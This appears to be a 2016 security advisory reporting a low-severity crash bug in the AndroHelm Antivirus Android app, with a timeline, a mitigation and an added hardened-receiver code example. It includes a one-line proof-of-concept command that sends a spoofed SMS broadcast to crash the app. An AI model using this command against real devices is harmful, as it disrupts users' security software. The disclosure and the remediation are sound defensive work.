SIK-2016-001


Title:

Remote Crash of AndroHelm Antivirus App

Report ID

SIK-2016-001

Summary:

  • Vendor: AndroHelm Antivirus
  • Product: Virenschutz für Android App (https://play.google.com/store/apps/details?id=com.androhelm.antivirus.free2)
  • Affected Version: 1.6, Platform Build Version Name 5.0.1-1624448
  • Severity: Low
  • Short summary:
    The application “AndroHelm Antivirus” by AndroHelm Antivirus contains several implementation flaws
    that can be abused locally or remotely to crash the application.

Details:

The attack can be triggered remotely by sending spoofed SMS messages. It can also be initiated locally by emulating the sending of an SMS or the corresponding payload. The application crashes once the victim receives a non-numeric SMS message. The problem is the internal BroadcastReceiver, which assumes that it receives proper numeric sender numbers of SMS messages.

See:

run app.broadcast.send --action android.provider.Telephony.SMS_RECEIVED --extra string test value

resulting in a NullPointerException (NPE):

java.lang.RuntimeException: Unable to start receiver com.androhelm.antivirus.receivers.SMSMonitor: java.lang.NullPointerException
E/AndroidRuntime(16060): at android.app.ActivityThread.handleReceiver(ActivityThread.java:2383)
E/AndroidRuntime(16060): at android.app.ActivityThread.access$1500(ActivityThread.java:141)
E/AndroidRuntime(16060): at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1310)
E/AndroidRuntime(16060): at android.os.Handler.dispatchMessage(Handler.java:99)
E/AndroidRuntime(16060): at android.os.Looper.loop(Looper.java:137)
E/AndroidRuntime(16060): at android.app.ActivityThread.main(ActivityThread.java:5041)
E/AndroidRuntime(16060): at java.lang.reflect.Method.invokeNative(Native Method)
E/AndroidRuntime(16060): at java.lang.reflect.Method.invoke(Method.java:511)
E/AndroidRuntime(16060): at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:793)
E/AndroidRuntime(16060): at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:560)
E/AndroidRuntime(16060): at dalvik.system.NativeStart.main(Native Method)
E/AndroidRuntime(16060): Caused by: java.lang.NullPointerException
E/AndroidRuntime(16060): at com.androhelm.antivirus.receivers.SMSMonitor.onReceive(SMSMonitor.java:31)
E/AndroidRuntime(16060): at android.app.ActivityThread.handleReceiver(ActivityThread.java:2376)
E/AndroidRuntime(16060): ... 10 more

Workaround

Suggested Mitigation

In the onReceive(Context, Intent) method of the BroadcastReceiver, verify that the intent value is a numeric SMS sender number before using it.
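
One way to apply this mitigation, as an added example that is not the vendor's code or part of the original advisory: a receiver that treats every extra of the SMS_RECEIVED broadcast as untrusted, so a broadcast carrying only a string extra, or a sender that is not numeric, is ignored instead of crashing the app. The class name HardenedSmsReceiver, its helper methods and the numeric-sender pattern are assumptions.

```java
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
import android.telephony.SmsMessage;
import android.util.Log;

// Hypothetical receiver (not AndroHelm's code): every extra is treated as untrusted.
public class HardenedSmsReceiver extends BroadcastReceiver {
    private static final String TAG = "HardenedSmsReceiver";
    private static final String SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED";

    @Override
    public void onReceive(Context context, Intent intent) {
        if (intent == null || !SMS_RECEIVED.equals(intent.getAction())) return;
        Bundle extras = intent.getExtras();
        if (extras == null) return;                  // broadcast carried no extras
        Object raw = extras.get("pdus");
        if (!(raw instanceof Object[])) return;      // e.g. only an unrelated string extra was sent
        String format = extras.getString("format");
        for (Object pdu : (Object[]) raw) {
            if (!(pdu instanceof byte[])) continue;  // skip entries that are not raw PDUs
            String sender = senderOf((byte[]) pdu, format);
            if (isNumericSender(sender)) {
                handleMessage(context, sender);
            } else {
                Log.w(TAG, "Ignoring SMS with missing or non-numeric sender");
            }
        }
    }

    // Returns the originating address, or null if the PDU cannot be parsed.
    private static String senderOf(byte[] pdu, String format) {
        try {
            SmsMessage msg = SmsMessage.createFromPdu(pdu, format); // API 23+
            return msg == null ? null : msg.getOriginatingAddress();
        } catch (RuntimeException e) {
            return null;                             // a malformed PDU must not crash the app
        }
    }

    // Assumed policy: optional leading '+', then digits only.
    static boolean isNumericSender(String sender) {
        return sender != null && sender.matches("\\+?[0-9]{1,20}");
    }

    private void handleMessage(Context context, String sender) {
        Log.i(TAG, "Processing SMS from validated sender"); // app-specific scanning goes here
    }
}
```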

Timeline

  • 2015-10-15 Vulnerability Discovered
  • 2015-10-26 Vulnerability Reported (1st attempt, no reaction)
  • 2015-10-30 Vulnerability Reported (2nd attempt, no reaction)
  • 2015-11-05 Vulnerability Reported (3rd attempt, no reaction)
  • 2016-08-07 Fully disclosed